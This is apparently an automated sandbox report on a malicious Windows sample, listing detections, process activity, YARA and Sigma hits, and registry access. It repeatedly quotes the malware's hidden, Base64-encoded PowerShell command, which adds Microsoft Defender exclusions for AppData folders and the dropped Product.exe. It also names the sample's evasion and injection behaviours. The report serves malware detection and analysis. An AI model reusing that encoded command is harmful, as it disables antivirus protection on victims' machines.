Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
test.exe

Overview

General Information

Sample name:test.exe
Analysis ID:1574666
MD5:59eab4d3e8b7c383d6e963256ce603d8
SHA1:367ac5a131bbebce102b0fc56c3f22224fe61b47
SHA256:ea8724ff42a52834a9af9c7d3fe10ac6ff1fe8064e4f1e3e519daf9396a508f0
Tags:exeuser-lontze7
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Yara detected AntiVM3
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Allocates memory in foreign processes
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious powershell command line found
Writes to foreign memory regions
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Suspicious Execution of Powershell with Base64
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • test.exe (PID: 2876 cmdline: "C:\Users\user\Desktop\test.exe" MD5: 59EAB4D3E8B7C383D6E963256CE603D8)
  • powershell.exe (PID: 7056 cmdline: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAHQAaQBuAGEAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsACwAQwA6AFwAVQBzAGUAcgBzAFwAdABpAG4AYQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABQAHIAbwBkAHUAYwB0AC4AZQB4AGUAOwA= MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 5956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WmiPrvSE.exe (PID: 4196 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
  • Product.exe (PID: 5136 cmdline: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe MD5: 59EAB4D3E8B7C383D6E963256CE603D8)
    • InstallUtil.exe (PID: 6000 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • powershell.exe (PID: 6884 cmdline: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAHQAaQBuAGEAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsACwAQwA6AFwAVQBzAGUAcgBzAFwAdABpAG4AYQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABQAHIAbwBkAHUAYwB0AC4AZQB4AGUAOwA= MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Product.exe (PID: 6904 cmdline: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe MD5: 59EAB4D3E8B7C383D6E963256CE603D8)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
0000000C.00000002.2234027771.0000000003B16000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000000.00000002.1508460985.0000000004252000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      00000004.00000002.1555656031.00000000043C6000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        00000000.00000002.1512992547.0000000005730000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          00000005.00000002.2739969270.0000000003C96000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            Click to see the 9 entries
            SourceRuleDescriptionAuthorStrings
            4.2.Product.exe.43c6b88.4.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              12.2.Product.exe.3b16b88.1.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                0.2.test.exe.5730000.12.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                  5.2.InstallUtil.exe.3c96b88.0.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                    0.2.test.exe.42d6b88.6.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security

                      System Summary

                      barindex
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAHQAaQBuAGEAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsACwAQwA6AFwAVQBzAGUAcgBzAFwAdABpAG4AYQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABQAHIAbwBkAHUAYwB0AC4AZQB4AGUAOwA=, CommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAHQAaQBuAGEAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsACwAQwA6AFwAVQBzAGUAcgBzAFwAdABpAG4AYQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABQAHIAbwBkAHUAYwB0AC4AZQB4AGUAOwA=, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1124, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAHQAaQBuAGEAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsACwAQwA6AFwAVQBzAGUAcgBzAFwAdABpAG4AYQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABQAHIAbwBkAHUAYwB0AC4AZQB4AGUAOwA=, ProcessId: 7056, ProcessName: powershell.exe
                      Source: Process startedAuthor: frack113: Data: Command: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAHQAaQBuAGEAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsACwAQwA6AFwAVQBzAGUAcgBzAFwAdABpAG4AYQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABQAHIAbwBkAHUAYwB0AC4AZQB4AGUAOwA=, CommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAHQAaQBuAGEAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsACwAQwA6AFwAVQBzAGUAcgBzAFwAdABpAG4AYQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABQAHIAbwBkAHUAYwB0AC4AZQB4AGUAOwA=, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1124, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAHQAaQBuAGEAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsACwAQwA6AFwAVQBzAGUAcgBzAFwAdABpAG4AYQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABQAHIAbwBkAHUAYwB0AC4AZQB4AGUAOwA=, ProcessId: 7056, ProcessName: powershell.exe
                      Source: Process startedAuthor: frack113: Data: Command: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAHQAaQBuAGEAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsACwAQwA6AFwAVQBzAGUAcgBzAFwAdABpAG4AYQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABQAHIAbwBkAHUAYwB0AC4AZQB4AGUAOwA=, CommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAHQAaQBuAGEAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsACwAQwA6AFwAVQBzAGUAcgBzAFwAdABpAG4AYQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABQAHIAbwBkAHUAYwB0AC4AZQB4AGUAOwA=, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1124, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAHQAaQBuAGEAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsACwAQwA6AFwAVQBzAGUAcgBzAFwAdABpAG4AYQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABQAHIAbwBkAHUAYwB0AC4AZQB4AGUAOwA=, ProcessId: 7056, ProcessName: powershell.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAHQAaQBuAGEAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsACwAQwA6AFwAVQBzAGUAcgBzAFwAdABpAG4AYQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABQAHIAbwBkAHUAYwB0AC4AZQB4AGUAOwA=, CommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAHQAaQBuAGEAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsACwAQwA6AFwAVQBzAGUAcgBzAFwAdABpAG4AYQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABQAHIAbwBkAHUAYwB0AC4AZQB4AGUAOwA=, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1124, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAHQAaQBuAGEAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsACwAQwA6AFwAVQBzAGUAcgBzAFwAdABpAG4AYQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABQAHIAbwBkAHUAYwB0AC4AZQB4AGUAOwA=, ProcessId: 7056, ProcessName: powershell.exe
                      No Suricata rule has matched

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: test.exeAvira: detected
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeAvira: detection malicious, Label: HEUR/AGEN.1360822
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeJoe Sandbox ML: detected
                      Source: test.exeJoe Sandbox ML: detected
                      Source: test.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: test.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: test.exe, 00000000.00000002.1508460985.0000000004723000.00000004.00000800.00020000.00000000.sdmp, test.exe, 00000000.00000002.1514008750.00000000059D0000.00000004.08000000.00040000.00000000.sdmp, test.exe, 00000000.00000002.1505562731.0000000003312000.00000004.00000800.00020000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.0000000004665000.00000004.00000800.00020000.00000000.sdmp, Product.exe, 00000004.00000002.1545385143.0000000003402000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: Plvuxr.pdb source: test.exe, 00000000.00000002.1511424136.0000000005550000.00000004.08000000.00040000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.000000000452E000.00000004.00000800.00020000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.000000000432B000.00000004.00000800.00020000.00000000.sdmp, Product.exe, 00000004.00000002.1545385143.00000000031A1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: test.exe, test.exe, 00000000.00000002.1508460985.0000000004723000.00000004.00000800.00020000.00000000.sdmp, test.exe, 00000000.00000002.1514008750.00000000059D0000.00000004.08000000.00040000.00000000.sdmp, test.exe, 00000000.00000002.1505562731.0000000003312000.00000004.00000800.00020000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.0000000004665000.00000004.00000800.00020000.00000000.sdmp, Product.exe, 00000004.00000002.1545385143.0000000003402000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: test.exe, 00000000.00000002.1513302058.0000000005790000.00000004.08000000.00040000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.0000000004665000.00000004.00000800.00020000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.000000000452E000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: test.exe, 00000000.00000002.1513302058.0000000005790000.00000004.08000000.00040000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.0000000004665000.00000004.00000800.00020000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.000000000452E000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: Plvuxr.pdbx source: test.exe, 00000000.00000002.1511424136.0000000005550000.00000004.08000000.00040000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.000000000452E000.00000004.00000800.00020000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.000000000432B000.00000004.00000800.00020000.00000000.sdmp, Product.exe, 00000004.00000002.1545385143.00000000031A1000.00000004.00000800.00020000.00000000.sdmp
                      Source: C:\Users\user\Desktop\test.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\test.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\test.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\test.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\test.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\test.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\Desktop\test.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Users\user\Desktop\test.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\test.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                      Source: C:\Users\user\Desktop\test.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                      Source: C:\Users\user\Desktop\test.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\Desktop\test.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Users\user\Desktop\test.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\test.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                      Source: C:\Users\user\Desktop\test.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                      Source: C:\Users\user\Desktop\test.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
                      Source: C:\Users\user\Desktop\test.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
                      Source: C:\Users\user\Desktop\test.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\Desktop\test.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
                      Source: C:\Users\user\Desktop\test.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\Desktop\test.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Users\user\Desktop\test.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\test.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\test.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\test.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\test.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\test.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\test.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\test.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\test.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\test.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\test.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\test.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
